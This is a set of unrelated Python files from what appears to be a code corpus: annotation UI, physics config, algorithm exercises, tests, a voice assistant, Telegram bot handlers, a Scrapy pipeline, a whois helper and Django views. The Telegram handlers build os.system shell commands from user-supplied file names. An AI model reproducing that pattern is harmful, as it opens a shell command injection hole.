            spans_list = list(combinations(spans,2))
            texts = st.selectbox(label='Index: Entity 1 - Entity 2', options=[None]+[f'{span_idx}: {span_el[0]} - {span_el[1]}' for span_idx, span_el in enumerate(spans_list)], key='index_span', on_change=generic.update_session, kwargs={'session_key':'category','value':None})
            if texts:
                # Option format is "<idx>: <entity1> - <entity2>"; split into parts.
                texts_list = texts.replace(':',' -').split(' - ')
                # Resolve both entities to token positions; relations are stored
                # with head = min position and child = max position.
                rel_span_pos = [generic.get_obj_value(spans_pos,texts_list[1]),generic.get_obj_value(spans_pos,texts_list[2])]
                span_dict = [span for span in st.session_state.relations if span['head']==min(rel_span_pos) and span['child']==max(rel_span_pos)][0]
                rel_idx = st.session_state.relations.index(span_dict)
                category = st.selectbox(label='Category', options=[None]+list(rel_dict.keys()), key='category')
                if category is not None:  # idiom fix: was `!= None`
                    if category != 'No-rel':
                        action = st.selectbox(label='Action', options=[None]+list(rel_dict[category].keys()), key='action')
                        if action:
                            polarity = st.selectbox(label='Polarity', options=[None]+rel_dict[category][action], key='polarity')
                            if polarity:
                                # Final relation label is "<polarity>-<action>".
                                span_dict['label'] = f'{polarity}-{action}'
                    else:
                        span_dict['label'] = 'No-rel'
                    generic.update_session(session_key='relations',key=rel_idx,value=span_dict)
                return None, None, texts_list, rel_idx, span_dict
    return None, None, None, None, {}
def process_iterator(iter_obj,page_num,rel_dict):
    """Render the annotation view for page `page_num` of `iter_obj`.

    Loads the record, offers span editing, visualizes entities, writes the
    (possibly edited) record back into `iter_obj` and session state, and
    finally runs the relation-labelling flow.

    Returns:
        True once a relation label was chosen during this render, else False.
    """
    text_idx, line = generic.check_iterator(iter_obj,page_num)
    if len(line) > 0:
        st.markdown(f'Current Page: `{page_num+1}` of `{len(iter_obj)}`')
        text, relations = generic.process_text(text_idx, line)
        text['spans'], text['relations'] = st.session_state.spans, st.session_state.relations
        ## NEW - Modify spans
        # Available edit modes depend on the span count: 'Modify' needs more
        # than one span, 'Remove' needs more than two.
        radio_options = [None,'Reset']
        if len(text['spans'])>1:
            radio_options = [None,'Modify','Reset']
            # radio_options.append('Modify')
        if len(text['spans'])>2:
            radio_options = [None,'Remove','Modify','Reset']
            # radio_options.append('Remove')
        # edit_spans = st.sidebar.radio('Modify spans',key='radio_spans',options=radio_options)
        edit_spans = st.sidebar.selectbox('Modify spans',key='radio_spans',options=radio_options)
        spans_sets, rerun = process_edit(edit_spans,text)
        if rerun:
            st.experimental_rerun()
        st.subheader('Text to Annotate!')
        text['spans'], text['relations'] = st.session_state.spans, st.session_state.relations
        # spans_pos = dict((span['text'],span['token_start']) for span in text['spans'])
        # spans_pos = [(span['text'],span['token_start']) for span in text['spans']]
        # Write the edited record back so downstream saves see the new spans/relations.
        iter_obj[st.session_state.page] = json.dumps({'text':st.session_state.text,'spans':st.session_state.spans,'tokens':json.loads(iter_obj[st.session_state.page])['tokens'],'_view_id':'relations','relations':st.session_state.relations,'answer':'accept'})
        generic.update_session(session_key='annotation',key='data',value=iter_obj)
        # Map each span text to the list of its token-start positions
        # (a list because the same text can appear more than once).
        spans_pos = dict()
        for span in text['spans']:
            if spans_pos.get(span['text']):
                spans_pos[span['text']].append(span['token_start'])
            else:
                spans_pos[span['text']] = [span['token_start']]
        if spans_sets:
            doc, labels = generic.process_displayc({'text':text['text'],'spans':spans_sets})
        else:
            doc, labels = generic.process_displayc(text)
        if labels:
            spacy_streamlit.visualize_ner(doc,show_table=False,manual=True,labels=labels,title='')
        else:
            st.info(text['text'])
        show_layout(type='spans',layout=[.2,.3])
        sel_rel = st.sidebar.checkbox('Show Relations',key='check_rel')
        # if sel_rel and len(spans_pos)>1:
        # Only show the relations table when more than one span mention exists.
        if sel_rel and len(spans_pos)>0 and max(max(map(lambda x:len(x),spans_pos.values())),len(spans_pos))>1:
            show_table(spans_pos)
        update_status = process_spans(rel_dict=rel_dict,spans=text['spans'],spans_pos=spans_pos,relations=st.session_state.relations,prev_rel=text['relations'])
        return update_status
    return False
def display_texts(json_lines,pages,rel_dict,page_num=0):
    """Render the annotation UI for one page of *json_lines*.

    Navigation is delegated to ``generic.process_btn`` and the per-page
    annotation workflow to ``process_iterator``; presumably the returned
    ``prev_page``/``next_page`` are the navigation button states and
    ``update_status`` flags whether annotations changed — confirm with callers.
    """
    prev_page, next_page, page_num = generic.process_btn(json_lines,pages,page_num)
    update_status = process_iterator(json_lines,page_num,rel_dict)
    return prev_page, next_page, update_status | staedi/rel_annotate | frontend.py | frontend.py | py | 15,136 | python | en | code | 0 | github-code | 50 |
40212789780 | import FWCore.ParameterSet.Config as cms
# Shared parameter set for secondary-vertex reconstruction in b-tagging.
# NOTE(review): 'avr' presumably selects the adaptive vertex reconstructor —
# confirm against the RecoBTag finder registry.
vertexRecoBlock = cms.PSet(
    vertexReco = cms.PSet(
        seccut = cms.double(6.0),            # secondary-vertex significance cut
        primcut = cms.double(1.8),           # primary-vertex compatibility cut
        smoothing = cms.bool(False),         # no track smoothing after the fit
        finder = cms.string('avr'),          # vertex finder algorithm name
        minweight = cms.double(0.5),
        weightthreshold = cms.double(0.001)
    )
)
| cms-sw/cmssw | RecoBTag/SecondaryVertex/python/vertexReco_cff.py | vertexReco_cff.py | py | 286 | python | en | code | 985 | github-code | 50 |
20935076901 | # Definition for singly-linked list.
class ListNode(object):
    """A node of a singly linked list."""

    def __init__(self, val=0, next=None):
        """Store the payload and the link to the following node."""
        self.val, self.next = val, next
class Solution(object):
    """Merge k sorted singly linked lists into one sorted list."""

    def mergeKLists(self, lists):
        """
        :type lists: List[ListNode]
        :rtype: ListNode

        Divide and conquer: merge each half recursively, then splice the
        two results together.  Runs in O(N log k) and — unlike the
        original, which allocated a fresh node per element — reuses the
        existing nodes, so no extra memory is needed beyond recursion.
        """
        if not lists:
            return None
        if len(lists) == 1:
            return lists[0]
        mid = len(lists) // 2
        left = self.mergeKLists(lists[:mid])
        right = self.mergeKLists(lists[mid:])
        return self._merge_two(left, right)

    def _merge_two(self, l1, l2):
        """Splice two sorted lists into one, reusing their nodes."""
        if l1 is None:
            return l2
        if l2 is None:
            return l1
        # Pick the smaller head as the merged head.
        if l1.val < l2.val:
            head = tail = l1
            l1 = l1.next
        else:
            head = tail = l2
            l2 = l2.next
        while l1 is not None and l2 is not None:
            if l1.val < l2.val:
                tail.next = l1
                l1 = l1.next
            else:
                tail.next = l2
                l2 = l2.next
            tail = tail.next
        # Append whichever list still has nodes.
        tail.next = l1 if l1 is not None else l2
        return head
| Jason-Woo/leetcode_problemset | Merge k Sorted Lists/code.py | code.py | py | 1,200 | python | en | code | 0 | github-code | 50 |
71027155036 | # -*- coding: utf-8 -*-
"""
Module : B8IT105 - Programming for Big Data
Assignment : CA3 - 10 function sequence calculator
using map, reduce, filter and generator.
Description : Unit tests for the sequence calculator application.
Student Code : 10541255
Student Name : Alyosha Pulle
"""
import unittest
from SequenceCalculator import SequenceCalculator
class TestSequenceCalculator(unittest.TestCase):
    """Unit tests for the SequenceCalculator application."""

    def setUp(self):
        # Fixtures shared by every test: two numeric sequences and one
        # sequence polluted with a string to exercise the error paths.
        self._seq1 = [9, 20, 4, 11, -7, 18, 13.5]
        self._seq2 = [21, 15.5, 6.0, -9, -13, 2, 6.5]
        self._bad_seq = self._seq1 + ['a']
        self._calc = SequenceCalculator()

    def test_min(self):
        """min() yields the smallest element; mixed types raise TypeError."""
        self.assertEqual(-7, self._calc.min(self._seq1))
        with self.assertRaises(TypeError):
            self._calc.min(self._bad_seq)

    def test_max(self):
        """max() yields the largest element; mixed types raise TypeError."""
        self.assertEqual(20, self._calc.max(self._seq1))
        with self.assertRaises(TypeError):
            self._calc.max(self._bad_seq)

    def test_sum(self):
        """sum() adds all elements; mixed types raise TypeError."""
        self.assertEqual(68.5, self._calc.sum(self._seq1))
        with self.assertRaises(TypeError):
            self._calc.sum(self._bad_seq)

    def test_cube(self):
        """cube() raises every element to the third power."""
        expected = [729, 8000, 64, 1331, -343, 5832, 2460.375]
        self.assertEqual(expected, self._calc.cube(self._seq1))
        with self.assertRaises(TypeError):
            self._calc.cube(self._bad_seq)

    def test_add(self):
        """add() sums two sequences element-wise."""
        expected = [30, 35.5, 10, 2, -20, 20, 20]
        self.assertEqual(expected, self._calc.add(self._seq1, self._seq2))

    def test_is_even(self):
        """is_even() keeps only the even elements."""
        self.assertEqual([20, 4, 18], list(self._calc.is_even(self._seq1)))
        with self.assertRaises(TypeError):
            list(self._calc.is_even(self._bad_seq))

    def test_greater_than_mean(self):
        """greater_than_mean() keeps elements above the sequence mean."""
        self.assertEqual([20, 11, 18, 13.5],
                         list(self._calc.greater_than_mean(self._seq1)))

    def test_to_fahrenheit(self):
        """to_fahrenheit() converts a Celsius sequence to Fahrenheit."""
        celsius = [0, 100] + self._seq1
        expected = [32, 212, 48.2, 68.0, 39.2, 51.8, 19.4, 64.4, 56.3]
        self.assertEqual(expected, self._calc.to_fahrenheit(celsius))

    def test_fibonacci(self):
        """fibonacci() yields the Fibonacci numbers inside a range."""
        self.assertEqual([21, 34, 55, 89],
                         list(self._calc.fibonacci(20, 100)))

    def test_primes(self):
        """primes() yields the prime numbers inside a range."""
        self.assertEqual([53, 59, 61, 67, 71, 73, 79, 83, 89, 97],
                         list(self._calc.primes(50, 100)))
        self.assertEqual(70,
                         len(list(self._calc.primes(0, 350))))
# Run the whole test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| alyoshapulledbs/B8IT105 | CA3/TestSequenceCalculatorApp.py | TestSequenceCalculatorApp.py | py | 3,763 | python | en | code | 0 | github-code | 50 |
2665724051 | import webbrowser as wb
import speech_recognition as sr
from time import ctime
import time
import os
from gtts import gTTS
import search_google.api
# the user is asking for their covfefe social media sources here
# we will say clara tell me news about refugees
def facebook(topic):
    """Announce the redirect and open Facebook in the default browser.

    Bug fix: the original interpolated the undefined global ``name``
    (NameError at call time); the spoken sentence now uses the ``topic``
    parameter.  TODO(review): ``name`` was presumably meant to be the
    user's name, which this script never collects.
    """
    speak("Hold on " + topic + " , I will redirect you to 10 articles.")
    wb.open("www.facebook.com")
def locations(topic):
    """Open Google Maps for a location extracted from the request.

    Bug fixes: the original read the local ``data`` before assigning it
    (UnboundLocalError) and spoke the undefined global ``name``; the words
    are now split from the ``topic`` parameter instead.
    TODO(review): index 2 assumes a phrase like "<verb> <noun> <location>" —
    confirm against the callers.
    """
    words = topic.split(" ")
    location = words[2]
    speak("Hold on " + topic + " , I will show you where the President of the United States just travelled" + location + " today.")
    wb.open("https://www.google.com/maps/place/Washington,+DC " + location + " /&")
def search(data, topic):
    """Run a Google search for the recognised phrase *data*.

    Bug fix: the spoken sentence referenced the undefined global ``name``
    (NameError); it now uses the ``topic`` parameter.
    """
    speak("wait for a while " + topic + " ,I will search for you.")
    wb.open("https://www.google.co.in/?gfe_rd=cr&ei=V7DXWJuQNarT8gfb-42QBw&gws_rd=ssl#newwindow=1&safe=active&q=" + data + "&*")
def speak(audioString):
    """Echo *audioString*, synthesise it with Google TTS and play the mp3."""
    print(audioString)
    tts = gTTS(text=audioString, lang='en')
    tts.save("audio.mp3")
    # NOTE(review): launching the mp3 via os.system relies on the Windows
    # file association; on Linux/macOS this likely does nothing useful —
    # confirm the target platform.
    os.system("audio.mp3")
def recordAudio():
    """Capture one utterance from the microphone and transcribe it.

    Uses the Google Speech Recognition web API with the default key.
    Returns the transcript, or an empty string when recognition fails.
    """
    recognizer = sr.Recognizer()
    recognizer.energy_threshold = 500
    with sr.Microphone() as source:
        audio = recognizer.listen(source)
    data = ""
    try:
        data = recognizer.recognize_google(audio)
        print("You said: " + data)
    except sr.UnknownValueError:
        print("Google Speech Recognition could not understand audio")
    except sr.RequestError as e:
        print("Could not request results from Google Speech Recognition service; {0}".format(e))
    return data
# Module-level keyword loop: listen continuously and open a news page when a
# recognised keyword is heard.  NOTE(review): this runs at import time, before
# the assistant loop below, and blocks until "Stop" is heard.
with sr.Microphone() as source:
    while True:
        r = sr.Recognizer()
        audio = r.listen(source)
        # Bug fix: ``sr.recognize`` does not exist; use the recognizer's
        # Google API call, as done elsewhere in this script.
        words = r.recognize_google(audio)
        print("You said " + words)
        if words == "Syria":
            # Bug fix: the module is imported as ``wb``, not ``webbrowser``.
            wb.open('https://www.google.com/search?safe=active&source=hp&ei=jcgjWt7dOs7D_Qak7JGoCw&q=todays+news+on+syria&oq=todays+news+on+syria&gs_l=psy-ab.3..35i39k1j0i22i30k1l9.706.2604.0.2775.21.11.0.0.0.0.320.1221.1j3j0j2.6.0....0...1c.1.64.psy-ab..15.6.1219.0..0j0i10i67k1j0i67k1j0i131k1j0i10k1j0i20i263i264k1j0i20i263k1.0.bPa7KAKkb1M')
        elif words == "Syria":
            # NOTE(review): unreachable — same keyword as the branch above;
            # presumably a different keyword was intended here.
            wb.open('https://www.google.co.uk')
        elif words == "Stop":
            break
def PA(data, topic):
    """Dispatch one recognised phrase *data* to the matching action.

    Bug fix: several branches referenced the undefined global ``name``
    (NameError at call time); the ``topic`` parameter is used instead.
    TODO(review): ``name`` was presumably the user's name, never collected.
    """
    if "what is your name" in data:
        speak("I'm Clara.")
    if "how are you" in data:
        speak("I am fine and you ?")
    if "I would like to see news on Syria today" in data:
        speak(topic)
    if "search for news on Syria" in data:
        search(data, topic)
    if "goodbye" in data:
        speak("Good bye ! ," + topic + " ,take care!!")
        exit()
# initialization: ask for the news topic, then listen in a loop.
speak("Hello! What type of news would you like to see today?")
topic = input()
speak("Okay I'll try to see if I can find the most factual articles on" + topic + "today")
while 1:
    print("Speak. . .")
    data = recordAudio()
    print("Processing. . .")
    # Bug fix: the transcript was recorded but never acted upon; hand it
    # to the assistant dispatcher.
    PA(data, topic)
| tinahaibodi/claraAI | data science/visionex.py | visionex.py | py | 3,141 | python | en | code | 0 | github-code | 50 |
7986839948 | import os
import shutil
from aiogram import Dispatcher, types
from aiogram.dispatcher import FSMContext
from aiogram.types import InputFile
from aiogram.utils import markdown
from utils.bot_init import bot
from utils.checks.curators_check import *
from utils.log import logging
from utils.states import CuratorsChecks
from utils.tables.csv_data import get_curator_words, get_specific_word, enter_audio_data, get_long_audios_names, \
insert_curator_id
from utils.variables import CURATORS_CHAT_ID, MARKERS_NAMES_AND_TIMETABLES, CURATOR_TASKS, \
SUM_PROFILES, TMP_DOWNLOAD_PATH, AVAIL_CURATORS_PROJECTS, AVAIL_AUDIO_PROJECTS_NAMES, AVAIL_AUDIO_TEXT_TYPES, \
YD_DICTORS_PROJECTS_PATH
from utils.yd_dir.yd_download import simple_download
from utils.yd_dir.yd_upload import upload_to_yd
async def project_chosen(message: types.Message, state: FSMContext):
logging(message)
if message.text not in AVAIL_CURATORS_PROJECTS:
await message.answer("Пожалуйста, выберите проект, используя клавиатуру ниже.")
return
await state.update_data(chosen_project=message.text)
await state.set_state(CuratorsChecks.waiting_for_curator_task.state)
keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)
for name in CURATOR_TASKS:
keyboard.add(name)
await message.answer("Выберите задачу", reply_markup=keyboard)
async def curator_task_chosen(message: types.Message, state: FSMContext):
logging(message)
await state.update_data(curator_task=message.text)
if message.text == CURATOR_TASKS[0]:
await state.set_state(CuratorsChecks.waiting_for_num_words.state)
await message.answer("Сколько слов хотите проверить", reply_markup=types.ReplyKeyboardRemove())
elif message.text == CURATOR_TASKS[1]:
await state.set_state(CuratorsChecks.waiting_for_specific_word.state)
await message.answer("Введите необходимое слово", reply_markup=types.ReplyKeyboardRemove())
elif message.text == CURATOR_TASKS[2]:
await state.set_state(CuratorsChecks.waiting_for_word.state)
await message.answer("Введите проверяемое слово (как в таблице)", reply_markup=types.ReplyKeyboardRemove())
else:
await state.set_state(CuratorsChecks.waiting_for_file.state)
await message.answer('Загрузите файлы (поставьте галочку "Группировать"',
reply_markup=types.ReplyKeyboardRemove())
async def curator_num_words_inserted(message: types.Message, state: FSMContext):
curator_id = SUM_PROFILES[str(message.from_user.id)]
user_data = await state.get_data()
project_name = user_data['chosen_project']
try:
arc_path = get_curator_words(message, curator_id, project_name)
arc = InputFile(arc_path)
await message.reply_document(arc)
os.remove(arc_path)
except:
await message.answer("Ошибка выдачи документов", reply_markup=types.ReplyKeyboardRemove())
await state.finish()
async def curator_file_upload(message: types.Message, state: FSMContext):
logging(message)
curator_id = SUM_PROFILES[str(message.from_user.id)]
file_name = message.document.file_name
download_file_path = os.path.join(TMP_DOWNLOAD_PATH, curator_id, file_name)
os.makedirs(os.path.join(TMP_DOWNLOAD_PATH, curator_id), exist_ok=True)
user_data = await state.get_data()
project_name = user_data['chosen_project']
server_file = await bot.get_file(message.document.file_id)
cmd1 = f'docker cp 10fd0db6c46c:{server_file.file_path} {download_file_path}'
cmd2 = f'docker exec KononovTGServer rm -rf {server_file.file_path}'
os.system(cmd1)
# await message.document.download(destination_file=download_file_path)
out_str = upload_to_yd(project_name, download_file_path, file_name)[0]
await message.answer(out_str, reply_markup=types.ReplyKeyboardRemove())
await state.finish()
os.system(cmd2)
async def word_inserted(message: types.Message, state: FSMContext):
logging(message)
word = message.text
await state.update_data(word=word)
await state.set_state(CuratorsChecks.waiting_for_indexes.state)
await message.answer("Введите результаты проверки в формате \nномер строки - категория ошибки shift+enter")
async def specific_word_inserted(message: types.Message, state: FSMContext):
logging(message)
curator_id = SUM_PROFILES[str(message.from_user.id)]
user_data = await state.get_data()
project_name = user_data['chosen_project']
try:
file_path = get_specific_word(message, curator_id, project_name)
file = InputFile(file_path)
await message.reply_document(file, reply=False)
os.remove(file_path)
except Exception as e:
logging(message, str(e))
await message.answer("Ошибка выдачи документа", reply_markup=types.ReplyKeyboardRemove())
await state.finish()
async def indexes_inserted(message: types.Message, state: FSMContext):
logging(message)
user_data = await state.get_data()
project_name = user_data['chosen_project']
word = user_data['word']
marker_id, curator_result = enter_curator_data(message, message.text, word, project_name)
await state.finish()
if marker_id:
tg_id = get_tg_user_id(marker_id)
marker_link = markdown.hlink(MARKERS_NAMES_AND_TIMETABLES.get(marker_id)[0], f'tg://user?id={tg_id}')
await bot.send_message(CURATORS_CHAT_ID, f'{marker_link}\n<b>{word}</b>\n{curator_result}',
parse_mode="HTML", disable_web_page_preview=True)
else:
await message.answer(f'Ошибка! \n{curator_result}')
async def dictor_chosen(message: types.Message, state: FSMContext):
logging(message)
keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)
await state.update_data(dictor=message.text)
for name in AVAIL_AUDIO_TEXT_TYPES:
keyboard.add(name)
await message.answer("Выберите тип текста", reply_markup=keyboard)
await state.set_state(CuratorsChecks.waiting_for_text_type.state)
async def text_type_chosen(message: types.Message, state: FSMContext):
logging(message)
keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)
await state.update_data(text_type=message.text)
user_data = await state.get_data()
dictor_name = user_data['dictor']
long_audios_names = get_long_audios_names(dictor_name, message.text)
for name in long_audios_names:
keyboard.add(name)
await message.answer("Выберите нужное аудио", reply_markup=keyboard)
await state.set_state(CuratorsChecks.waiting_for_long_audio.state)
async def long_audio_project_chosen(message: types.Message, state: FSMContext):
logging(message)
user_data = await state.get_data()
dictor_name = user_data['dictor']
text_type = user_data['text_type']
long_audio_name = message.text
rpp_name = long_audio_name.split('/')[-1].replace('wav', 'rpp')
curator_id = SUM_PROFILES[str(message.from_user.id)]
filename = f'{dictor_name}_{text_type}_{rpp_name}'
file_path = os.path.join(TMP_DOWNLOAD_PATH, curator_id, filename)
os.makedirs(os.path.join(TMP_DOWNLOAD_PATH, curator_id), exist_ok=True)
try:
simple_download(f'{YD_DICTORS_PROJECTS_PATH}/{dictor_name}/{text_type}/{rpp_name}', file_path)
except:
rpp_name = rpp_name.replace('.rpp', '.aup3')
simple_download(f'{YD_DICTORS_PROJECTS_PATH}/{dictor_name}/{text_type}/{rpp_name}', file_path)
file1 = InputFile(file_path)
await message.reply_document(file1, reply=False)
os.remove(file_path)
insert_curator_id(long_audio_name, curator_id)
if dictor_name == 'Artem':
try:
flname = f"{text_type}_{long_audio_name.split('/')[-1].replace('wav', 'txt')}"
file2 = InputFile(f'/home/akononov/work_dir/TTS_bot/utils_data/Artem_metki/{flname}')
await message.reply_document(file2, reply=False)
except:
pass
await state.finish()
async def audio_archive_upload(message: types.Message, state: FSMContext):
logging(message)
curator_id = SUM_PROFILES[str(message.from_user.id)]
file_name = message.document.file_name
download_file_path = os.path.join(TMP_DOWNLOAD_PATH, curator_id, file_name)
os.makedirs(os.path.join(TMP_DOWNLOAD_PATH, curator_id), exist_ok=True)
server_file = await bot.get_file(message.document.file_id)
cmd1 = f'docker cp 10fd0db6c46c:{server_file.file_path} {download_file_path}'
await state.update_data(cmd2=f'docker exec KononovTGServer rm -rf {server_file.file_path}')
await state.update_data(dfp=download_file_path)
os.system(cmd1)
# await message.document.download(destination_file=download_file_path)
await state.set_state(CuratorsChecks.waiting_metki_check_confirm.state)
keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)
for button in ['Подтвердить загрузку', 'Отменить загрузку']:
keyboard.add(button)
await message.answer(check_metki(file_name, download_file_path), reply_markup=keyboard)
async def metki_check_confirm(message: types.Message, state: FSMContext):
user_data = await state.get_data()
cmd2 = user_data['cmd2']
download_file_path = user_data['dfp']
curator_id = SUM_PROFILES[str(message.from_user.id)]
if message.text == 'Подтвердить загрузку':
await message.answer('Загрузка начата...', reply_markup=types.ReplyKeyboardRemove())
out_str = enter_audio_data(message, curator_id, AVAIL_AUDIO_PROJECTS_NAMES[0],
flag='curator', file_path=download_file_path)
try:
await message.answer(out_str, reply_markup=types.ReplyKeyboardRemove())
except:
await message.answer('Файлы загружены', reply_markup=types.ReplyKeyboardRemove())
else:
await message.answer('Загрузка отменена', reply_markup=types.ReplyKeyboardRemove())
os.system(cmd2)
shutil.rmtree(os.path.join(TMP_DOWNLOAD_PATH, curator_id))
await state.finish()
def register_handlers_curators(dp: Dispatcher):
dp.register_message_handler(project_chosen, state=CuratorsChecks.waiting_for_project_name)
dp.register_message_handler(dictor_chosen, state=CuratorsChecks.waiting_for_dictor_name)
dp.register_message_handler(text_type_chosen, state=CuratorsChecks.waiting_for_text_type)
dp.register_message_handler(long_audio_project_chosen, state=CuratorsChecks.waiting_for_long_audio)
dp.register_message_handler(curator_task_chosen, state=CuratorsChecks.waiting_for_curator_task)
dp.register_message_handler(curator_num_words_inserted, state=CuratorsChecks.waiting_for_num_words)
dp.register_message_handler(curator_file_upload, content_types=[types.ContentType.DOCUMENT],
state=CuratorsChecks.waiting_for_file)
dp.register_message_handler(audio_archive_upload, content_types=[types.ContentType.DOCUMENT],
state=CuratorsChecks.waiting_for_archive)
dp.register_message_handler(word_inserted, state=CuratorsChecks.waiting_for_word)
dp.register_message_handler(specific_word_inserted, state=CuratorsChecks.waiting_for_specific_word)
dp.register_message_handler(indexes_inserted, state=CuratorsChecks.waiting_for_indexes)
dp.register_message_handler(metki_check_confirm, state=CuratorsChecks.waiting_metki_check_confirm)
| Theones777/TTS_bot | handlers/curators.py | curators.py | py | 11,806 | python | en | code | 0 | github-code | 50 |
19990773923 | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy.pipelines.images import ImagesPipeline
import scrapy
import hashlib
# class WeiboPipeline(object):
# def process_item(self, item, spider):
# return item
class WeiboImagesPipeline(ImagesPipeline):
    """Scrapy images pipeline storing each picture under
    ``./<user id>/<post bid>/<sha1 of the image url>.jpg``."""

    def get_media_requests(self, item, info):
        """Emit one download request per picture, tagging it with the
        ids needed later to build the storage path."""
        for img_url in item['pic_urls']:
            print(img_url)
            yield scrapy.Request(url=img_url,
                                 meta={'id': item['id'],
                                       'img_url': img_url,
                                       'bid': item['bid']})

    def file_path(self, request, response=None, info=None):
        """Derive the relative storage path from the request metadata."""
        meta = request.meta
        digest = hashlib.sha1()
        digest.update(meta['img_url'].encode('utf8'))
        return "./{}/{}/{}.jpg".format(meta['id'], meta['bid'], digest.hexdigest())

    def item_completed(self, results, item, info):
        """Log the download results and pass the item through unchanged."""
        print(results)
        return item
| wangj98/weibo | weibo/pipelines.py | pipelines.py | py | 1,137 | python | en | code | 0 | github-code | 50 |
27989542722 | #DAY 19 0F 100
#TO FIND IF NUMBER IS PALLINDRONE OR NOT IN PYTHON
#taking input
num = int(input("Enter a number to check if its pallindrone or not: "))
# Bug fix: work on the absolute value — the original looped on the raw
# number, and Python's floor division drives a negative value to -1, not
# 0, so the loop never terminated for negative input.
temp = abs(num)
rev = 0
# reverse the digits arithmetically
while temp != 0:
    rev = rev * 10 + temp % 10
    temp = temp // 10
# a negative number can never equal its (non-negative) digit reversal
# (output strings kept verbatim, sic "pallindrone")
if num >= 0 and num == rev:
    print("The number is pallindrone.")
else:
    print("the number is not a pallindrone number.")
| ayushigeorge/python_projects | day19of100.py | day19of100.py | py | 407 | python | en | code | 3 | github-code | 50 |
73696114074 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys
import subprocess
import time
"""Takes a textfile with ip-adresses and their frequency as input, performs
whois-request using the Linux-Bash and produces a csv-output showing the
ip-address and the correspondign frequency, the countrycode and the owner
of the ip-address"""
# the file which contains the ip-addresses and number of occurance must be
# specified when calling the script. if not, there is a little error-
# message and the script terminates
# The input file with ip-addresses and their frequencies must be given on
# the command line; otherwise print a short usage note and terminate.
try:
    inputfile = sys.argv[1]
except IndexError:  # bug fix: was a bare except, which also swallowed SystemExit etc.
    print("""
    Error! You must provide a file as input like this:
    python3 whois-helper.py addresses.txt
    The script will be terminated now.
    """)
    sys.exit()

# "with" guarantees the result file is closed even if the loop raises.
with open("results.csv", "w") as outputfile:
    # headline of the CSV output
    outputfile.write("\"frequency\",\"IP-address\",\"countrycode\",\"description\"\n")
    with open(inputfile) as source:
        for line in source:
            line = line.strip()
            cc_tmp_list = []
            desc_tmp_list = []
            # split the frequency and the ip-address
            pieces = line.split(' ')
            command = subprocess.Popen(['whois', pieces[1]], stdout=subprocess.PIPE)
            print("whois-query for:", pieces[1])
            # frequency and ip-address columns
            outputfile.write("\"{}\",\"{}\",".format(pieces[0], pieces[1]))
            # scan the whois reply; usually several lines match, but only
            # the first country/description hit is kept (as before)
            for reply_line in command.stdout:
                reply_line = reply_line.strip().decode('UTF-8')
                if reply_line.startswith("country:") or reply_line.startswith("Country:"):
                    cc_tmp_list.append(reply_line.split(":")[1].strip())
                if reply_line.startswith("descr:") or reply_line.startswith("OrgName") or reply_line.startswith("owner:"):
                    desc_tmp_list.append(reply_line.split(":")[1].strip())
            command.stdout.close()
            command.wait()  # reap the child process (avoid zombies)
            # Bug fix: the original indexed [0] unconditionally, so a reply
            # without country/description crashed with IndexError before the
            # intended "reset to None" fallback could ever take effect.
            countrycode = cc_tmp_list[0] if cc_tmp_list else None
            description = desc_tmp_list[0] if desc_tmp_list else None
            outputfile.write("\"{}\",\"{}\"\n".format(countrycode, description))
            # wait for 3 seconds in order not to get blocked - hopefully
            time.sleep(3)
| alex-gehrig/whois-helper | whois-helper.py | whois-helper.py | py | 2,836 | python | en | code | 0 | github-code | 50 |
13719821630 | # -*- coding: utf-8 -*-
from django.conf import settings
from django.contrib.sites.models import Site
from django.contrib.syndication.views import Feed
from django.core.exceptions import PermissionDenied
from django.http import Http404
from django.views.generic.base import TemplateView
from django.views.generic.detail import DetailView
from django.views.generic.list import ListView
from .libs.tag_cloud import TagCloud
from .models import Blog, Tag, Category
__author__ = "liuzhijun"
class AboutView(TemplateView):
    """Static "about" page with comments enabled."""

    template_name = 'about.html'

    def get_context_data(self, **kwargs):
        context = super(AboutView, self).get_context_data(**kwargs)
        site = Site.objects.get_current()
        # page metadata consumed by the template
        context['page'] = {
            'comments': True,
            'path': self.request.path,
            'title': u'关于',
            'permalink': "http://" + site.domain + "/about",
        }
        return context
class TagsView(ListView):
    """Tag-cloud page: every tag sized and coloured by its post count."""

    template_name = 'page.html'
    context_object_name = 'tag_list'
    model = Tag

    def get_context_data(self, **kwargs):
        context = super(TagsView, self).get_context_data(**kwargs)
        tag_list = context.get("tag_list")
        # NOTE(review): one COUNT query per tag (N+1); fine for a small tag
        # table, otherwise annotate the queryset instead.
        for tag in tag_list:
            tag.blog_count = Blog.objects.filter(tags__pk=tag.id).count()
        max_count = min_count = 0
        if len(tag_list) > 0:
            max_count = max(tag_list, key=lambda tag: tag.blog_count).blog_count
            min_count = min(tag_list, key=lambda tag: tag.blog_count).blog_count
        tag_cloud = TagCloud(min_count, max_count)
        for tag in tag_list:
            tag.font_size = tag_cloud.get_tag_font_size(tag.blog_count)
            tag.color = tag_cloud.get_tag_color(tag.blog_count)
        page = dict()
        page['type'] = 'tags'
        # Bug fix: the tag page was titled u"分类" ("categories") while
        # CategoriesView carried u"标签" ("tags") — the two labels were swapped.
        page['title'] = u"标签"
        context['page'] = page
        return context
class CategoriesView(ListView):
    """List every category together with the number of posts it holds."""

    template_name = "page.html"
    context_object_name = "categories"
    model = Category

    def get_context_data(self, **kwargs):
        context = super(CategoriesView, self).get_context_data(**kwargs)
        # NOTE(review): one COUNT query per category (N+1); acceptable for a
        # small category table.
        for category in context.get("categories"):
            category.blog_count = Blog.objects.filter(category__pk=category.id).count()
        page = dict()
        page['type'] = 'categories'
        # Bug fix: the category page was titled u"标签" ("tags") while
        # TagsView carried u"分类" ("categories") — the labels were swapped.
        page['title'] = u"分类"
        context['page'] = page
        return context
class BasePostListView(ListView):
    """Shared configuration for every post-listing view below."""
    paginate_by = settings.PAGE_SIZE    # page size taken from project settings
    context_object_name = "posts"       # template variable holding the posts
class ArchiveView(BasePostListView):
    """Chronological archive of all published public posts."""

    template_name = "archive.html"

    def get_queryset(self):
        """Tag the first post of every publication year with ``year`` so
        the template can render a year heading above it."""
